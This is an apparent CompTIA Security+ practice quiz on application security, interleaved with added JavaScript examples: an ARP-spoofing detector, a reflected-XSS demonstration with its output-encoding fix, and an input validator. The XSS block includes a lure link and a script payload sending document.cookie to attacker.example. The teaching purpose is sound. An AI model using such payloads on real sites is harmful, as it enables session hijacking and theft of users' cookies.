Test your basic knowledge

Comptia Security +: Domain4 Application Security

Instructions:
  • Answer 50 questions in 15 minutes.
  • If you are not ready to take this test, you can study here.
  • Match each statement with the correct term.
  • Don't refresh. All questions and answers are randomly picked and ordered every time you load a test.

This is a study tool. The 3 wrong answers for each question are randomly chosen from answers to other questions. So you might at times find the answers obvious, but you will see that it reinforces your understanding as you take the test each time.
1. Security objectives placed on an application are identified - controlling the scope of the threat modeling process

2. Three main cookie types

3. A named collection of Web sites that can be assigned a specific security level

4. OSI layer that provides transparent transfer of data between end users

5. This layer formats and encrypts data to be sent across a network - providing freedom from compatibility problems - sometimes called the syntax layer

6. Enticing a user to execute malicious code stored on a web server (e.g. via a hyperlink in an email)

7. OSI layer responsible for path determination and logical addressing - routers operate at this layer

8. OSI layer that establishes - manages and terminates the connections between the local and remote application

9. Have a timeout value - are not deleted when the user closes their web browser - used to store user preferences and information about the user's connection

10. Categories of XSS

11. Scripting languages - developed by Microsoft to allow developers to extend and reuse web functionality

12. Used to record user's web activity - may be downloaded in the background

13. Allow an attacker to intercept and modify data sent between two network devices - hijacking of network communications - attacks the data link layer
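
The attack in question 13 works by answering ARP requests with the attacker's MAC so that traffic for the gateway (or a victim host) is delivered to the attacker first. The following is an added example, not part of the quiz: a small detector that replays constructed ARP reply records (the kind a sniffer on the same segment would capture) and raises an alert when an IP address changes its MAC binding or when one MAC ends up claiming several IP addresses at once, the signature of a man-in-the-middle position. The record layout and the addresses are invented for the example.

```javascript
// Added example (not from the quiz). Constructed ARP reply records as a
// passive sensor on the segment would see them: the gateway 10.0.0.1 and a
// host 10.0.0.25 answer normally, then a third MAC claims both of them.
const ARP_LOG = [
  { t: 0, op: 'reply', senderIp: '10.0.0.1',  senderMac: 'aa:aa:aa:aa:aa:01' },
  { t: 1, op: 'reply', senderIp: '10.0.0.25', senderMac: 'bb:bb:bb:bb:bb:25' },
  { t: 5, op: 'reply', senderIp: '10.0.0.1',  senderMac: 'cc:cc:cc:cc:cc:99' }, // attacker claims gateway
  { t: 5, op: 'reply', senderIp: '10.0.0.25', senderMac: 'cc:cc:cc:cc:cc:99' }, // and the victim host
  { t: 9, op: 'reply', senderIp: '10.0.0.1',  senderMac: 'aa:aa:aa:aa:aa:01' }, // real gateway answers again
];

// Walk the replies in order, maintaining ip -> mac and mac -> set(ip).
// Two conditions are flagged:
//   1. an IP whose MAC differs from the one previously learned (binding flap);
//   2. a MAC that is currently bound to more than one IP (spoofer in the middle).
function detectArpSpoofing(records) {
  const ipToMac = new Map();
  const macToIps = new Map();
  const alerts = [];

  for (const r of records) {
    if (r.op !== 'reply') continue; // requests carry no claim worth tracking here
    const prev = ipToMac.get(r.senderIp);

    if (prev !== undefined && prev !== r.senderMac) {
      alerts.push({ t: r.t, reason: 'binding changed', ip: r.senderIp, from: prev, to: r.senderMac });
      macToIps.get(prev).delete(r.senderIp); // the old MAC no longer claims this IP
    }

    ipToMac.set(r.senderIp, r.senderMac);
    if (!macToIps.has(r.senderMac)) macToIps.set(r.senderMac, new Set());
    const claimed = macToIps.get(r.senderMac);
    claimed.add(r.senderIp);

    if (claimed.size > 1) {
      alerts.push({ t: r.t, reason: 'one MAC claims multiple IPs', mac: r.senderMac, ips: [...claimed] });
    }
  }
  return alerts;
}

// Runs stand-alone: prints the alerts produced by the constructed log above.
for (const a of detectArpSpoofing(ARP_LOG)) console.log(JSON.stringify(a));
```

The binding flap at t=9 is as telling as the first change: the real gateway is still alive and answering, so the segment now has two hosts arguing over one address. Static ARP entries for the gateway on critical hosts, or dynamic ARP inspection on the switch, are the controls that stop the attack rather than merely detect it.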

14. OSI layer responsible for end-to-end connections and reliability (i.e. TCP)

15. Cause of open SMTP relays

16. P2P stands for...

17. The unauthorized modification of the data stored within a cookie

18. Protocols in this layer (NNTP)

19. Each client is a peer and serves each other client on the network - requires client application and appropriate open network ports to operate

20. Attack that occurs when a user navigates to a web site and hostile content is automatically downloaded and executed

21. Protocols used in this layer - IP

22. Enabling the cookie secure-bit setting - avoiding the use of cookies to hold sensitive data - and blocking third-party cookies will prevent ______

23. XSS stands for

24. Type - length - format - range

25. Phase of threat modeling that reviews application ingress and egress data flow and trust boundaries

26. Sensitive information stored within a cookie that is obtained by unauthorized users

27. Process to identify and assess a system's security risks

28. OSI layer that provides the means to transfer data between network entities and detect/correct errors that may occur in the physical layer

29. Deleted when the user closes their web browser - can contain authentication-related information

30. COTS stands for

31. Phases of threat modeling

32. OSI layer responsible for data representation and encryption (MIME)

33. Target for trojans and viruses - used to transfer stolen/pirated data - unintentional disclosure of data are risks associated with

34. OSI layer that relates to the physical connection of two devices (i.e. RS-232)

35. Ensure data input is validated - encode user-supplied data - don't click on unknown hyperlinks - implement restrictive web browser security zones are preventative measures against
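
Questions 6, 10, 23 and 35 all circle the same attack. As an added example (not code from the quiz), the block below shows the reflected category of XSS end to end: the lure link an attacker would mail to a victim, the vulnerable search page that reflects the query verbatim, and the hardened page that applies the "encode user-supplied data" control from question 35. The host names, the page layout and the payload are constructed for the example; the attacker's script is the classic cookie exfiltration that the HttpOnly cookie flag exists to blunt.

```javascript
// Added example (not from the quiz). Reflected XSS and the output-encoding fix.

// Encode the characters that can end an HTML text or attribute context.
// This is the server-side "encode user-supplied data" control.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable search page: the query is concatenated straight into the
// response, so whatever the victim's link carried runs in the victim's browser.
function renderVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened page: identical markup, but the user-controlled value is encoded
// for the HTML text context it lands in.
function renderSafe(query) {
  return `<p>Results for: ${htmlEncode(query)}</p>`;
}

// The delivery step from question 6: a link the attacker sends by email,
// pointing at the vulnerable page with the payload in the query string.
function buildLureLink(base, payload) {
  return `${base}?q=${encodeURIComponent(payload)}`;
}

// What the server sees when the victim clicks: q decoded from the URL.
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') ?? '';
}

// Crude marker used only by this demo: does the output carry a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload: sends the victim's cookies to an attacker-controlled host.
const PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';
const LURE = buildLureLink('https://shop.example/search', PAYLOAD);

// Runs stand-alone: compare the two responses for the same lure.
console.log('lure:      ', LURE);
console.log('vulnerable:', renderVulnerable(queryFromUrl(LURE)));
console.log('hardened:  ', renderSafe(queryFromUrl(LURE)));
```

Encoding must match the context the data is inserted into: the text-context encoder above is not enough for a value placed inside a JavaScript string or a URL attribute, which need their own encoders. Stored XSS uses the same fix at render time, while DOM-based XSS has to be fixed in the client-side script that writes to the page.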

36. A method of code signing - allows developers to obtain a digital certificate generated by a certificate authority and digitally sign ActiveX controls

37. OSI layer defines the electrical / physical device specs (media - signal - and binary transmission). This includes the layout of pins - voltages - cable specifications - hubs - network adapters - host bus adapters and more.

38. Area of memory where function calls are stored

39. Attackers sniff network traffic and capture a cookie download or gain access to a computer and view a locally stored cookie

40. Security zone options offered by Internet Explorer

41. OSI model layers

42. A scripting language - developed by Netscape to perform client-side web development

43. Can leave the sandbox and obtain access to client resources

44. ARP stands for...

45. OSI layer attributed with 75% of malicious attacks

46. OSI layer that provides interhost communication (Named Pipes)

47. Can filter out most buffer overflow attacks

48. Number one safeguard against buffer overflow - XSS - data injection - and DoS attacks
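
Question 24 lists the four checks that make up the safeguard asked for in question 48. As an added example that is not part of the quiz, the block below turns those four checks into a small allow-list validator: every field of a request body must match a declared type, length bound, format and numeric range, and any field the specification does not mention is rejected. The field specification and the sample request are constructed for the example; it assumes the body has already been parsed from JSON, so numbers arrive as numbers rather than strings.

```javascript
// Added example (not from the quiz). Allow-list input validation covering
// the four checks from question 24: type, length, format and range.

// Constructed specification for a sign-up request. Length caps bound buffer
// and storage use, format patterns reject injection characters, and ranges
// keep numeric fields plausible.
const USER_SPEC = {
  username: { type: 'string',  minLen: 3, maxLen: 32,  format: /^[a-z0-9_]+$/ },
  age:      { type: 'integer', min: 13,   max: 120 },
  email:    { type: 'string',  maxLen: 254, format: /^[^\s@]+@[^\s@]+\.[^\s@]+$/ },
  comment:  { type: 'string',  maxLen: 500 },
};

// Validate an object against a spec. Returns a list of human-readable errors;
// an empty list means the input is acceptable. Checks are ordered so that a
// wrong type stops further checks on that field (a number has no length).
function validate(input, spec) {
  const errors = [];

  for (const [field, rule] of Object.entries(spec)) {
    const v = input[field];
    if (v === undefined || v === null) { errors.push(`${field}: missing`); continue; }

    if (rule.type === 'integer') {
      if (!Number.isInteger(v)) { errors.push(`${field}: not an integer`); continue; }
      if (rule.min !== undefined && v < rule.min) errors.push(`${field}: below ${rule.min}`);
      if (rule.max !== undefined && v > rule.max) errors.push(`${field}: above ${rule.max}`);
    } else if (rule.type === 'string') {
      if (typeof v !== 'string') { errors.push(`${field}: not a string`); continue; }
      if (rule.minLen !== undefined && v.length < rule.minLen) errors.push(`${field}: shorter than ${rule.minLen}`);
      if (rule.maxLen !== undefined && v.length > rule.maxLen) errors.push(`${field}: longer than ${rule.maxLen}`);
      if (rule.format && !rule.format.test(v)) errors.push(`${field}: bad format`);
    } else {
      errors.push(`${field}: unsupported rule type ${rule.type}`);
    }
  }

  // Allow-list, not deny-list: anything the spec does not name is refused.
  for (const key of Object.keys(input)) {
    if (!(key in spec)) errors.push(`${key}: unexpected field`);
  }
  return errors;
}

// Constructed sample requests: one clean, one carrying the kinds of input the
// quiz's attacks rely on (markup in a name, a string where a number is expected,
// an oversized free-text field, an extra field the handler never asked for).
const GOOD_REQUEST = { username: 'alice_1', age: 30, email: 'alice@example.org', comment: 'hello' };
const BAD_REQUEST = {
  username: '<script>',
  age: '30',
  email: 'not-an-address',
  comment: 'a'.repeat(501),
  isAdmin: true,
};

// Runs stand-alone: prints the verdict for both requests.
console.log('good:', validate(GOOD_REQUEST, USER_SPEC));
console.log('bad: ', validate(BAD_REQUEST, USER_SPEC));
```

Validation decides whether input is accepted at all; it does not replace output encoding, since a value that passes a permissive format rule can still be dangerous in the context it is later written to.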

49. Protocols used in this layer (ARP)

50. Key functionality (how the application works) is identified and an application diagram developed in this phase of threat modeling